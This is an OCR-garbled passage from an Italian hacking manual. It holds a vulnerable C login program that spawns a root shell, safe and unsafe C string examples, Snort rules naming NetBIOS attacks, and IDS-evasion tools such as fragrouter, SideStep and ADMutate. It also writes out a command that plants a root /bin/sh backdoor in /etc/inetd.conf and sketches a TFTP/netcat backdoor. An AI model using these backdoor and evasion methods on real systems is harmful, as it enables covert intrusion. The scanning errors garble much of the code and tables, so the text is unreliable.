scheck (char *u) 
{ 

struct spwd *s; 

s = getspnam(u) ; 
i-f('.s) 

return NULL; 
return s->sp_pwdp; 

} 



int check (char *u, char *pwd) 
{ 

struct passwd *p; 
char *cpwd; 



p = getpwnam(u) ; 
±f(!p) 

return 0; 
if (strlen (p->pw _passwd) ==1) 

p->pw_passwd = scheck (u) ; 
if( ! p->pw_passwd) 

return 0; 

cpwd = (char *) crypt (pwd, p->pw _passwd) ; 
if (strcmp (cpwd, p->pw _passwd) ) 

return 0; 
p = getpwnam("nobody") ; 
return p->pw_uid; 



main () 
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int id; 

char *passwd = NULL; 
char prompt [200 ] ; 
char user [256] ; 

prlntf ("Insert your password length: ") ; 
fflush (stdout) ; 

fgets(user, slzeof (user) , stdln) ; 
user [strlen (user) -1] = 0; 

count = atol (user) +2; /* to get \n and \0 */ 
passwd = (char *)malloc (count+1) ; 

prlntf ("Insert your username: ") ; 
fflush (stdout) ; 

fgets(user, slzeof (user) , stdln); 
user [strlen (user)-l] = 0; 

sprint f (prompt, "Insert password for localhost : %s" , user); 
prlntf ("%s: ", prompt); 

If (count > 16) 
{ 

prlntf ("Your password Is too long.\n"); 
exit (0) ; 

} 

fgets (passwd, count, stdln); 
passwd [ strlen (passwd) -1] = 0; 
lf((ld = check (user, passwd))) ( 

prlntf ( "You are logged In ! ! ! \n ") ; 

setuld (Id) ; 

system ("/bln/sh -1 ") ; 

exit (0) ; 

} else 

prlntf ( "Error. \n ") ; 

} 

<-X-> 



Metodi di programmazione per evitare i buffer overflow 

Vedremo in questa parte le metodologie di programmazione legate all'uso delle normali 

funzioni di libreria del linguaggio C. 

strcpy(destinazione, sorgente) 

Copia una stringa sorgente dentro ad una destinazione. 

La funzione controlla nella stringa sorgente il carattere di fine sringa '\0' e fino a quel punto 
continua a copiare carattere dopo carattere dentro al buffer di destinazione. 
L'algoritmo potrebbe essere : 



char *source, *dest; 

while (*dest++ = *source++) ; 



Corretto 


Non corretto 


void funzione (char *str) { 
char buffer [256] ; 

strncpy (buffer , str, sizeof (buffer)— 1) ; 
buffer(sizeof (buffer) -1] = 0; 

} 


void funzione (char *str) { 
char buffer [256] ; 
strcpy (buffer, str) ; 

} 



strcat(destinazione, sorgente) 

Accoda a destinazione il buffer sorgente. 
L'algoritmo potrebbe essere quello che segue : 
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char *source, *dest; 

while (*dest++) ; 

while (*dest++ = *source++) ; 



Corretto 


Non corretto 


void funzione (char *str) { 
char buffer [256] ; 

strncat (buffer , str, sizeof (buffer)— 1— 
strlen (buffer) ) ; 

buffer (sizeof (buffer) -1] = 0; 

} 


void funzione (char *str) { 
char buffer [256] ; 
strcat (buffer, str) ; 

) 



sprintf(buffer, "stringa formattazione", variabili); 



Esegue la stampa dentro ad un buffer di una serie di variabili usando la sringa di 
formattazione la quale usa gli stessi formati di printf(). 







void funzione (char *str) { 
char buffer [256] ; 

snprintf (buffer , sizeof (buffer) -1, "%s", 
str) ; 
} 


void funzione (char *str) { 
char buffer [256] ; 
sprintf (buffer, "%s", str); 

} 



gets(stringa) 



Legge da tastiera una stringa e la assegna a stringa. 











void funzione () ( 
char buffer [256] ; 

f gets (buffer , sizeof (buffer) -1, stdin); 

} 


void funzione () ( 
char buffer [256] ; 
gets (buffer) ; 

} 



scanf("stringa for,mattazione", variabili) 
sscanf(buffer, "stringa formattazione", variabili); 
fscanf(handle, "stringa formattazione", variabili); 



Le funzioni leggono un input da diverse sorgenti (tastiera, buffer, file) usando una stringa di 
formattazione e assegnano i valori letti alle variabili. 



Corretto 


Non corretto 


void funzione () ( 
char buffer [256] ; 
int num; 

num = fscanf (stdin, "%255s", buffer); 

} 


void funzione () { 
char buffer [256] ; 
int num; 

num = fscanf (stdin, "%s", buffer); 

} 



memcpy(destinazione, sorgente, dimensione) 



Copia da sorgente a destinazione byte a byte per la mlunghezza specificata. 



Corretto 


Non corretto 


void funzione (char *sorgente) ( 

char buffer [256] ; 

if (strlen (sorgente) > 255) 
return; 

memcpy (buffer, sorgente, 
strlen (sorgente) ) ; 
} 


void funzione (char *sorgente) { 

char buffer [256] ; 

memcpy (buffer, sorgente, 
strlen (sorgente) ) ; 
} 



I programmi che svologono alcune funzioni particolari devono inoltre avere certi tipi di 
accorgimenti. 
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Prendiamo ad esempio il problema della validazione dei DNS. 
Il metodo che segue risulta essere non corretto. 

int validate (u_int32_t ipaddr, char *hostname) 
{ 

struct inaddr ia; 
struct hostent *he; 

memset (Sia, 0, sizeof (ia)); 
ia . s_addr = ipaddr; 

he = gethostbyaddr (&ia, sizeof (ia) , AF_INET) ; 
if (!he) 

return 0; 

if ( !he—>h_name) 
return 0; 



if (!strcmp(he—>h__name, hostname) ) 
return 1; 




Il sorgente corretto è invece : 

int validate (u_int32_t ipaddr, char *hostname) 
{ 

struct inaddr ia; 
struct hostent *he; 
int count; 

memset (Sia, 0, sizeof (ia)); 
ia . s_addr = ipaddr; 

he = gethostbyaddr (Sia, sizeof (ia) , AF_INET) ; 
if (!he) 

return 0; 

if ( !he—>h_name) 
return 0; 

if (strcmp(he—>h_name, hostname)) 
return 0; 

he = gethostbyname (hostname) ; 
if (!he) 

return 0; 

for (count = 0; he->h_addr__list [count] ; count++) 

if ( Imemcmp (S ipaddr , he— >haddr list [count] , 4) 
return 1; 

return 0; 



Anche il settore della vaildazione dei dati inseriti da utenti esistono metodi corretti e metodi 
invece che possono generare problemi. 



idefine BAD "/ ;[]<>S\t" 



char *query ( ) 
{ 

char *user_data, *cp; 
/* Get the data */ 



user_data = getenv ( " QUERY_STRING" ) ; 
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for (cp = user_data; * (cp += strcspn(cp, BAD)); ) 
*cp = 

return user_data; 

} 



Il sistema coretto è invece : 

tfdefine OK "abcdefghijklmnopqrstuvwxyz\ 
BCDEFGHIJKLMNOPQRSTUVWXYZ\ 
1234567890_-.@"; 

char *query ( ) 
{ 

char *user_data, *cp; 
/* Get the data */ 

user_data = getenv ( "QUERY__STRING" ) ; 

/* Remove ali but good characters */ 

for (cp = user_data; * (cp += strspn (cp, OK) ) ; ) 
*cp = 

return user_data; 

} 



I sistemi I DS e metodi di elusione 

I sistemi informativi, sia collegati a intranet che ad internet, sono generalmente obbiettivi di 
attacchi informatici di tutti i tipi ed indirizzati a qualsiasi scopo. 

Non pensiate che l'hacker esterno che manovra in fili di un attacco da un recondito angolo 
buio della rete sia di fatto il maggiore pericolo per una rete aziendale. 

Gli attaccanti possono essere da qualsiasi parte ed in particolar modo in mezzo ai dipendenti 
della aziende stesse delle qali sono i network. 

Su queste reti ci sono dati di tutti i tipi comprese informazioni che sono considerate private e 
spesso soggette a segreto da cui potrebbero dipendere gli esiti delle aziende stesse. 
Per questo motivo tra i dogmi della security, sul mio sito http://www.bernardotti.al.it, ho 
riportato quello secondo il quale la sicurezza non è una spesa ma un investimento. 
Controllare una piccola rete è relativamente semplice. 

Dico relativamente in quanto intendo dire 'controllare e farlo bene' e non solo 'controllare alla 
spera in Dio'. 

In pratica le attività svolte da questa vengono tenute su dei files di LOG i quali se messi su 
machine sicure possono essere utili per individuare non solo frodi già eseguite ma anche 
tentativi in atto. 

Prendiamo il classico esempio dei tentivi combinatori legati all'individuazione di una pasword. 

II file di og conterrà infinità di righe legate ai vari tentativi. 

Fate attenzione che qualsiasi attività potrebbe lasciare il file di log e questi potrebbero essere 

su sistemi non accessibili come ad esempio qui da me in WEBSITEK.COM. 

In questo caso possediamo una macchina che funziona da fortezza LOGS e sulla quale gira 

un sistema IDS, precisamente NFR per ambiente Unix. 

Ma come funzionano questi tipi di programmi. 

Uno di questi deriva da un sistema di SNIFFER e questo potrebbe fare capire che alcuni di 

questi di fatto funzionano come questo tipo di programmi. 

In altre parole, per introdurre l'idea, pensate a cosa fa lo sniffer. 

Questo si collega ad un certo segmento di rete analizzando tutti i pacchetti che passano su 
questo. 

Ma di fatto gli attacchi cosa sono e come vengono eseguiti ? 

In ogni caso sono sempre stringhe di comandi che vengono indirizzati verso a qualche 
software particolare come ad esempio quello di gestione di un server http. 
Il sistema IDS intercetta il traffico e quindi ricerca dentro ai vari pacchetti quelli che 
contengono 'riferimenti' a attacchi pericolosi per la rete. 
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Un sistema che di fatto è in grado di vedere i pacchetti che passano su una rete può 
facilmente anche essere utilizzato per confrontrare i contenuti dei pacchetti con quelli reperiti 
da un database. 

Prendiamo ad esempio uno sniffer come SNORT. 

Questo è basato sulla libreria di capture dei pacchetti libcap. 

Si tratta di un pacchetto lanciato da linea di comando anche se la versione Windows possiede 
anche un interfaccia di comando e controllo in modalità grafica. 
Questa è esattamente quella che segue: 
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La linea di comando standard è : 



ma è possibile specificare i percorsi di dove salvare i logs. 

./snort -dev -1 ./log 

La specifica dell'IP su cui eseguire lo sniffing : 



Snort possiede anche on file snort.conf con dentro la configurazione. 
Mediante la linea di comando è possibile specificare il file di configurazione. 



Il sistema di analisi permette di creare delle regole che verranno utilizzate per le ricerche 
dentro ai pacchetti. 

Una linea con dentro una regole potrebbe essere : 

alert tep any any -> 192.168.1.0/24 111 (content : " \ 00 01 86 a5\"; \ 
msg: "mountd access";) 
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Snort possiede un sistema complesso finalizzato alla scrittura di tali regole tanto da 
comprendere anche l'uso di variabili. 

var MY_NET $ (MY_NET : -192. 168.1. 0/24 ) 

log tcp any any -> $ (MY_NET : ?MY_NET Is undefined! ) 23 



Quando si inastala il pacchetto vengono inserite dentro alle directory di setup anche un certo 
numero con delle regole di base. 



28/10/2001 


17. 


52 


1 . 


. 433 


attack—responses . rules 


01/11/2001 


18. 


03 


21 . 


823 


backdoor . rules 


01/11/2001 


18. 


03 


1 . 


434 


bad—traffic. rules 


28/10/2001 


17. 


52 


5. 


849 


ddos . rules 


28/10/2001 


17. 


52 


3. 


277 


dns . rules 


05/11/2001 


20. 


05 


3, 


. 141 


dos . rules 


19/11/2001 


17. 


17 


10. 


027 


exploit . rules 


28/10/2001 


17. 


52 


2. 


664 


finger . rules 


28/10/2001 


17. 


52 


6. 


139 


ftp . rules 


01/11/2001 


18. 


03 


16. 


040 


icicip—info . rules 


01/11/2001 


18. 


03 


4, 


301 


icitip . rules 


28/10/2001 


17. 


52 


1 . 


311 


info . rules 


28/10/2001 


17. 


55 




59 


locai . rules 


28/10/2001 


17. 


52 


3. 


615 


mise . rules 


28/10/2001 


17. 


52 


3. 


150 


netbios . rules 


28/10/2001 


17. 


52 


5. 


415 


policy . rules 


28/10/2001 


17. 


,52 


1. 


880 


porn . rules 


28/10/2001 


17. 


52 


11. 


873 


rpc . rules 


28/10/2001 


17. 


52 


2. 


445 


rservices . rules 


28/10/2001 


17. 


52 


4. 


569 


scan . rules 


28/10/2001 


17. 


52 


3. 


521 


shellcode . rules 


28/10/2001 


17. 


52 


4. 


,098 


smtp . rules 


28/10/2001 


17. 


52 


9. 


101 


sql . rules 


28/10/2001 


17. 


52 


2. 


827 


telnet . rules 


28/10/2001 


17. 


52 


1. 


140 


t ftp . rules 


02/11/2001 


08. 


21 


14. 


927 


virus . rules 


02/11/2001 


08. 


00 


9. 


162 


web-attacks . rules 


28/10/2001 


17. 


52 


20. 


151 


web-egi . rules 


28/10/2001 


17. 


52 


7. 


677 


web-coldfusion . rules 


28/10/2001 


17. 


52 


7. 


869 


web-frontpage . rules 


28/10/2001 


17. 


52 


17. 


924 


web-iis . rules 


19/11/2001 


17. 


17 


40. 


.920 


web-mise . rules 



Come avrete notato i nomi dei files specificano il sistema di filtraggio inserito dentro a quelle 
regole a cosa si riferiscono. 

Prendiamo il file che contiene il filtraggio dei comandi netbios. 

# (C) Copyright 2001, Martin Roesch, Brian Caswell, et al. Ali rights reserved. 

# $Id: netbios. rules, v 1.12 2001/10/29 01:52:54 roesch Exp $ 
# 

# NETBIOS RULES 
# 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS nimda .eml"; 

content: " / 00 / E / 00 IMI 00 / L" ; flags:A+; classtype : bad-unknown ; 

reference : uri, www. datafellows . com/v^descs/nimda . shtml; sid: 1293; rev:2; ) 

alert tcp $EXTERNAL_NET any -> $H0ME_NET 139 (msg : "NETBIOS nimda .nws"; 

content: " / 00 / N / 00 /W/ 00 / S" ; flags:A+; classtype : bad-unknown; 

reference : uri, www. datafellows . com/v—descs /nimda . shtml; sid: 1294; rev:2; ) 

alert tcp $EXTERNAL_NET any -> $H0ME_NET 139 (msg : "NETBIOS nimda RICHED20.DLL"; 

content: "RI 00 / 1 / 00 / C / 00 / H / 00 / E / 00 / D / 00 / 2 / 00 / 0" ; flags:A+; classtype: bad-unknown; 

reference : uri, www. datafellows . com/v—descs /nimda . shtml; sid: 1295; rev:2; ) 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS DOS RFPoison"; flags: A+; 

content: " / 5C 00 5C 00 2A 00 53 00 4D 00 42 00 53 00 45 00 52 00 56 00 45 00 52 00 00 
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00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 

00 1 " ; reference : arachnids, 454; classtype : attempted-dos; sid:529; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS NT NULL session"; flags: 
A+; content: "100 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4E 00 54 00 
20 00 31 00 33 00 38 00 311"; reference :bugtraq, 1163 ; reference : cve, CVE-2000-0347 ; 
reference -.arachnids, 204; classtype : attempted-recon; sid:530; rev.3;) 

alert tcp $EXTERNAL_NET any -> $HOME__NET 139 (msg : "NETBIOS RFParalyze Attempt"; flags: 
A+; content : "BEAVIS" ; content : "yep yep" ; classtype : attempted-recon; sid:1239; rev.l;) 
alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS SMB ADMIN$access" ; flags : 
A+; content: "\\ADMIN$ 100 41 3a 001"; reference: arachnids, 340; classtype : attempted- 
admin; sid:532; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS SMB C$ access"; flags: A+; 
content: "I5cIC$I00 41 3a 00 / "; reference : arachnids, 339; classtype : attempted-recon; 
sid:533; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS SMB CD.."; flags: A+; 
content : "\\ .. I 2f 00 00 001"; reference : arachnids, 338; classtype : attempted-recon; 
sid:534; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS SMB CD. . . "; flags: A+; 
content : "\\ ... 1 00 00 001"; reference : arachnids, 337; classtype : attempted-recon; 
sid:535; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS SMB D$access" ; flags : A+; 
content : "\\D$ 1 00 41 3a 001"; reference : arachnids, 336; classtype : attempted-recon; 
sid:536; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME__NET 139 (msg : "NETBIOS SMB IPC$access" ; flags : A+; 
content : "\\IPC$ 1 00 41 3a 001"; reference : arachnids, 335; classtype : attempted-recon; 
sid:537; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg : "NETBIOS SMB IPC$access" ; flags : A+; 
content: " / 5c00 / I / 00 / P / 00 / C / 00 / $ / 000000 / IPC / 00 / "/ reference : arachnids, 334; 
classtype : attempted-recon; sid:538; rev.l;) 

alert tcp $EXTERNAL_NET any -> $HOME__NET 139 (msg : "NETBIOS Samba clientaccess" ; flags : 
A+; content :" 1 00 1 Unix 1 00 1 Samba"; re ference : arachnids, 341; classtype : not-suspicious; 
sid:539; rev.l;) 

Andando sulla rete troverete librerie immense di regole da utilizare con la vostra installazione 
anche se di fatto il nostro interesse nei confronti di questi sistemi è esattamente il contrario 
ovvero come evadere I sistemi IDS. 

Nei capitoli precedenti abbiamo ad esempio parlato di sistemi di buffer overflow. 
Come d'altra parte anche le altre cose, questa metodologia potrebbe essere particolarmente 
complessa, se non impossibile, nel caso in cui si cerchi di eseguire l'attacco verso un sistema 
che dspone di un IDS. 

Sistemi IDS come NFR possiedono una complessità notevole e richiedono un sistema 
dedicato, oltre a costi esorbitanti. 

Chiaramente l'efficacia di un sistema IDS dipende in particolar modo dalle dimensioni del 
database contenente gli identificatori degli attacchi e dal metodo di aggiornamento di questi. 
L'uso di sistemi dedicati dventa necessario per due motivi. 

Pensate al fatto che un sistema software intercetta I pacchetti che passano su una rete e 
confrontano I dati contenuti dentro a questi eseguendo dei confronti su moli di dati che 
possono essere anche di grosse dimensioni. 

L'uso di una di questi pacchetti su un sistema che svolge anche altri compiti potrebbe 

intaccare le prestazioni del sistema stesso. 

Ma come è possibile evadere l'intercettazione dei sistemi IDS ? 

Sembra stupido ma uno dei metodi migliori per eludere un IDS è utilizzare un sistema di 

attacco che non sia registrato nel database di questo. 

Un altro metodo è quello legato alla frammentazione dei pacchetti. 

Prendiamo ad esempio FRAGROUTER. 

Questo pacchetto, prelevabile da 



possiede 35 metodi differenti per spezzare e tagliare I pacchetti di dati in modo da cercare di 
evitare che il sistema IDS riesca ad identificare le stringhe dalle quali verrebbero rilevati gli 
identificativi degli attacchi. 

La bellezza di FRAGROUTER è che questo separa le funzionalità di un attacco da quelle 
delle frammentazione. 

Come dice il suo nome di fatto il software è un ROUTER. 

L'attaccante sceglie un certo pacchetto da usare nell'attacco il quale potrebbe generare un 
certo numero di pacchetti. 
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Questi verrebbero inviati verso FRAGROUTER il quale gli applicherebbe uno dei 35 metodi e 
successivamente li dirigerebbe vero al sistema di destinazione. 
La sintasi è : 

fragrouter - network intrusion detection evasion toolkit 
Synopsis 



fragrouter [ -i interface ] [ -p ] [ ATTACK ] host 
Description 

Fragrouter is a program for routing network traffic in such a way as 
to elude most network intrusion detection systems . 
The attacks implemented correspond to those listed in the Secure 
Networks " " Insertion, Evasion, and Denial of Service: Eluding Network 
Intrusion Detection' ' paper of January, 1998. 

Options 



Speci fy the interface to accept packets on. 
~P 

Preserve the entire protocol header in the first fragment . This is 
enabled by de fault on Linux, which doesn't allow sending of short 
fragment s . 

The following attack options are mutually exclusive - you may only 
speci fy one type of attack to run at a time. 

-Bl 

baseline-1 : Normal IP forwarding . 
-FI 

frag-1 : Send data in ordered 8-byte IP fragments . 
-F2 

frag-2 : Send data in ordered 24 -byte IP fragments . 
-F3 

frag-3 : Send data in ordered 8-byte IP fragments, with one fragment 

sent out of order. 

-F4 

frag-4 : Send data in ordered 8-byte IP fragments, duplicating the 

penultimate fragment in each packet . 

-F5 

frag-5 : Send data in out of order 8-byte IP fragments, duplicating 

the penultimate fragment in each packet. 

-F6 

frag-6 : Send data in ordered 8-byte IP fragments, sending the marked 

last fragment first . 

-FI 

frag-1 : Send data in ordered 16-byte IP fragments, preceding each 
fragment with an 8-byte nuli data fragment that overlaps the latter 
half of it . This amounts to the forward-overlapping 16-byte fragment 
rewriting the nuli data back to the real attack. 

Un software che utilizza una metodologia completamente differente per eludere i sistemi IDS 
èSIDESTEP. 

Il programma è scaricabile da : 
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http : //www. robertgraham . com/tmp/ sidestep . exe 



Si tratta di un programma lanciabile da linea di comando : 
c: \>sidestep 

SideStep vi . 0 Copyright (c) 2000 by Network ICE 
http : //www . robertgraham . com/tmp/ sidestep . html 
usage : 

sidestep <target> [<options>] 
Sends attacks at the target that evades an IDS. 
One of the following protocols /attacks must be specified: 
-rpc RPC PortMap DUMP 
FTP CD ~root 
DNS ver sion .bind query 
SNMP lanman user enum 
/cgi -bin/phf 
BackOrifice ping 



-ftp 
-dns 
-snmp 
-http 
-bo 
-ali 

One of three modes must be specified: 
-norm Does no evasion (normal attacks) 

-evade Attempts to attack target evading the IDS 

-false Does not attack the system at ali (false positive) 

Example : 
sidestep 10.0.0.1 -evade -dns 



Un pacchetto particolare che viene utilizzato nell'ambito delle evasioni dai sistemi IDS è 
ADMUTATE. 

I metodi generalmente usati dai sistemi IDS per l'identificazione degli attacchi sono : 

* Signature analysis 

* Protocol analysis 



Prendiamo ad esempio i metodi per eludere, con un sistema di buffer overflow, l'occhio 
attento di un istema IDS. 

ADMutate accetta come input un exploit basato su di un buffer overflow. 

Il tool modifica l'exploit utilizzando un sistema usato anche dai virus chiamato polimorfismo. 

In altre parole ADMutate modifica il buffer overflow fino a creare un nuovo exploit che di fatto 

non possiede gli deintificatori che potrebbero essere intercettati da un sistema IDS. 

Ma come fa a creare una versione polimorfica dell'exploit relativo ad un buffer overflow ? 

Vi ricordate che un buffer overflow consiste di fatto in tre componeti principali ? 

Il primo componente è la sequenza di NOP che permette al sistema di saltare come 

esecuzione in un punto che non crei problemi. 

Il secondo componente è il codice assembler che deve esser eseguito. 

Il terzo è il puntatore di salto. 

ADMutate altera ciascuno di questi tre componenti al fine di creare un set di istruzioni 
differenti che facciano alla fine la stessa cosa. 

Per quello che riguarda i NOP non fa altro che sostituire con istruzioni nulle ovvero che non 
facciano in pratica nulla come ad esempio muovere avanti e indietro i valori da un registro. 
Ad esempio mete istruzioni del tipo : 

MOV EAX, 1 
MOV EBX., E/ 



In pratica queste istruzioni non fanno nulla ma di fatto la stringa derivata non corrisponde con 
quelle ricercate dal sistema IDS. 

ADMutate possiede un set di isruzioni possibili per la sostituzione dei NOP. 
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Per quello che riguarda il codice da eseguire ADMutate utilizza una semplicissima frizione per 
alterare il codice macchina. 

ADMutate applica una fnzione XOR al codice per combinare questo con delle chiavi generate 
in modo random. 

L'output di questo processo è grappolo di un linguaggio incomprensibile che essendo 
generato in kmod random non può essere intercettato. 

Chiaramente ADMutate aggiunge anche il piccolissimo meccanismo per la decodifica il quale 
di fatto è invece in formato comprensibile dal processore del sistema vittima. 
IN questo modo i compoenti di un buffer overflow diventano quattro. 

Ad ogni modo ADMutate deve essere sicuro che quello che ha generato di fatto non venga 
intercettato dal sistema IDS. 



links relativi a I DS 



fragrouter - Fragmenting packets to evade IDS. 
OS: Unix 

Homepage: http://www.anzen.com/research/nidsbench/ 

Source Download: http://www.anzen.com/research/nidsbench/fraqrouter- 

1.6.tar.qz 

nemesis - Generating / spoofing various packets. 
OS: Unix 
Homepage: N/A 

Source Download: http://the.wiretapped.net/security/packet- 
construction/ nemesis/ nemesis- 1. 32 .tar.qz 

nessus - Triggering scanning alarms. 
OS: Unix 

Homepage: http://www.nessus.org/ 

Source Download: http: //www. nessus.org/download. html 

nmap - Slow scanning attempting to "fly under the radar". 
OS: Unix 

Homepage: http://www.insecure.org/nmap/index.html 

Source Download: http://download.insecure.org/nmap/dist/nmap- 

2.54BETA30.tqz 

sneeze - Testing Snort alarm and logging capability. 
OS: Unix 
Homepage: N/A 

Source Download: http://snort.sourceforqe.net/sneeze-1.0.tar 

snot - Testing IDS robustness, as well as alarm and logging capability. 
OS: Unix 

Homepage: http://www.sec33.com/sniph/ 

Source Download: http://www.sec33.com/sniph/snot-0.92a.tar.qz 

stick - Testing IDS robustness, as well as alarm and logging capability. 
OS: Unix 

Homepage: http://www.eurocompton.net/stick/ 

Source Download: http://packetstormsecurity.org/distributed/stick.tqz 

tcpreplay - Replaying real traffic in which to hide attacks. 
OS: Unix 

Homepage: http://www.anzen.com/research/nidsbench/ 
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Source Download: http://www.anzen.com/research/nidsbench/tcpreplay- 
l.O.l.tar.qz 

whisker - Triggering URL alarms or attempting to slip obfuscated URLs 
past IDS. 
OS: Unix 

Homepage: http://www.wiretrip.net/ rfp/ 

Download: http://www.wiretrip.net/ rfp/bins/ whisker/ whisker. tar.gz 



Metodi alternativi per la creazione di backdoor 

Alcune volte, in particolar modo sotto sistemi Unix, la creazione di una backdoor non 
pretende l'installazione di nessun sotfware aggiuntivo. 

Supponiamo di aver individuato un buffer overflow che ci permetta di scrivere dentro ad un 
file di configurazione come ad esempio inetd. 

Inetd controlla tutte le porte listate e al verificarsi di una connessione lancia il programma 
abbinato. 

Se ad esempio all'interno di 



/etc/inetd.conf 



ci fosse una linea del tipo : 



11111 stream tcp nowait root /bin/sh sh -I 

al verificarsi di una connessione sulla porta 11111 verrebbe lanciata /bin/sh. 

A questo punto il camando eseguito dal sistema legato al buffer overflow dovrebbe mirare ad 

aggiungere in coda al file /etc/inetd.conf la linea : 

/bin/sh - c "echo 11111 stream tcpo nowait root /bin/sh sh -i" »/etc/inetd.conf; killall -HUP 
inted 



L'ultima istruzione eseguirebbe il kill di inetd per cui il processo sarebbe riattivato leggendo il 
nuovo file di configurazione. 

Un altro molto sfruttato sui sistemi vittima è legato ai trasferimenti via il Trivial FTP ovvero 
TFTP. 

Inetd.conf ha ilseguente formato : 



# inetd. conf This file describes the services that will be available 

# through the INETD TCP/IP super server. To re-con figure 

# the running INETD process , edit this file, then send the 

# INETD process a SIGHUP signal . 
# 

# Version: @ (#) /etc/inetd. conf 3.10 05/27/93 
# 

# Authors: Originai taken front BSD UNIX 4.3/TAHOE. 

# Fred N. van Kempen, <waltje@uwalt . ni .mugnet . org> 
# 

# Modified for Debian Linux by Ian A. Murdock <imurdock@shell .portai . com> 
# 

# Modified for RHS Linux by Marc Swing <marc@redhat . com> 
§ 

# <service_name> <sock_type> <proto> <flags> <user> <server _path> <args> 

§ Echo, discard, daytime, and chargen are used primarily for testing. 
# 

# To re-read this file after changes, just do a 'killall -HUP inetd' 
§ 

#echo stream tcp nowait root internai 

#echo dgram udp wait root internai 

#discard stream tcp nowait root internai 
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idiscard 


dgram 


udp 


walt 


root 


internai 


idaytime 


stream 


tcp 


nowalt 


root 


internai 


idaytime 


dgram 


udp 


walt 


root 


internai 


ichargen 


stream 


tcp 


nowait 


root 


internai 


ichargen 


dgram 


udp 


walt 


root 


internai 


itime stream 


tcp 


nowalt 


root 


Internai 


itime dgram 


udp 


walt 


root 


internai 



These are standard services. 



ftp stream 
telnet stream 
i 

i Shell, login, 
i 

shell stream 
login stream 
iexec stream 
icomsat dgram 
talk dgram 
ntalk dgram 
idtalk stream 
# 

§ Pop and imap 



tcp nowait root /usr/sbin/tcpd in.ftpd -1 -a 

tcp nowait root /usr/sbin/tcpd in.telnetd 

exec, comsat and talk are BSD protocols . 



tcp 
tcp 
tcp 
udp 
udp 
udp 
tcp 



nowait 

nowait 

nowait 

wait 

wait 

wait 

wait 



root 
root 
root 
root 
nobody. tty 
nobody. tty 
nobody. tty 



/usr/sbin/t cpd 
/usr/sbin/t cpd 
/usr/sbin/t cpd 
/usr/sbin/t cpd 



in . rshd 
in . rlogind 
in . rexecd 
in . comsat 
/usr/sbin/tcpd in . talkd 
/usr/sbin/tcpd in.ntalkd 
/usr/sbin/tcpd in.dtalkd 



mail services et al 



ipop-2 stream tcp nowait root 

§pop-3 stream tcp nowait root 

iimap stream tcp nowait root 

i 

i The Internet UUCP service. 
i 

iuucp stream tcp nowait 
-1 



/usr/sbin/tcpd ipop2d 
/usr/sbin/tcpd ipop3d 
/usr/sbin/tcpd imapd 



uucp /usr/sbin/tcpd /usr/lib/uucp/uucico 



Tftp service is provided primarily for booting . Most sites 



# run this only on machines acting as 

§ this unless you *need* it . 

# 

itftp dgram udp wait root 

ibootps dgram udp wait root 



"boot servers . " Do not uncomment 



/usr/sbin/t cpd 
/usr/sbin/t cpd 



in.tftpd 
bootpd 



# Finger, systat and netstat give out user Information which may be 

i valuable to potential "system crackers . " Many sites choose to disable 

i some or ali of these services to improve security. 

i 

finger stream tcp nowait nobody /usr/sbin/tcpd 

icfinger stream tcp nowait root /usr/sbin/tcpd 

isystat stream tcp nowait guest /usr/sbin/tcpd 

inetstat stream tcp nowait guest 

-f inet 



in . fingerà 
in . cfingerd 
/bin/ps -auwwx 
/usr/sbin/tcpd /bin/netstat 



§ Authentication 
# 

# identd is run standalone now 
# 

iauth stream tcp wait root 



/usr/sbin/in . identd in . identd -e -o 



Mentre il sistema precedente era un ottimo metodo per aprire una backdoor sotto Unix, quello 

che segue può essere applicato anche a sistemi Windows. 

Per l'esecuzione di questo metodo sono necessari i seguenti steps : 



L'attaccante esegue l'overflow di un buffer forzando il sistema a eseguire il sistema 
TFTP 

Il sistema attivato viene usato per trasferire NETCAT configurato sul sistema vittima. 
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Ora l'attaccante possiede una canale interattivo per lavorare sulla macchina vittima. 
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L'uso di J ava in rete 

Vi chiederete come mai a questo punto mettiamo in baloo anche Java. 

Una delle funzioni fondamentali legate all'hacker è quella di sapere sempre in qualsiasi 

circostanza dimenticare con le funzioni di trasmissione sulla rete. 

Negli appositi capitoli abbiamo parlato di SOCKETS, WINSOCKET e di classi scritte 
mediante il C/C++ usando queste funzioni. 

I socket come abbiamo già visto sono in pratia dei canali che permettono a due punti 
geograficamente remoti di comunicare tramite riferimenti che vengono settati e poi aperti 
mediante le varie funzioni socket pesenbti nelle varie librerie di sistema legate al sistema 
operativo specifico. 

Esistono dei casi in cui diventa necessario poter gestire i vari protocolli di rete. 

Queste esigenze spesso capitano sul campo di battaglia ovvero quando non c'e' la 

possibilità di mettersi li e compilare un programma. 

Java negli ultimi anni è stato reso disponibile per qualsiasi ambiente e comqunue rimane 
un linguaggio funzionale indipendentemente dal sistema su cui gira. 
In altre parole un programma scritto in Java funzionerà senza modifiche sotto Unix alo 
stesso modo di quanto funziona sotto Windows. 

L'esempio che ho deciso di riportare l'ho scritto con la finalità di esporre l'uso delle 
funzioni socket collegate alla gestione dei vari protocolli come SMTP, FTP ecc. 

II grosso successo di Java dipende sicuramente dal fatto che la pubblicità' fattagli lo 
elegge a linguaggio per eccellenza per lo sviluppo di software per Internet. 

Lo stesso discorso e' avvenuto con il protocollo TCP/IP la cui la strabiliante popolarità' e' 
derivata anche in questo caso al suo legame con Internet. 

Spesso il troppo parlare di certe cose fa nascere dei miti che alcune volte portano ad 
esagerare sulla vera essenza di una cosa oppure spingono a utilizzare delle parole senza 
di fatto conoscerne il vero significato. 

Java e TCP/IP costituiscono due esempi di un caso e dell' altro. 

Il primo e' stato talmente pubblicizzato legato a Internet che sembra quasi che I' unico 
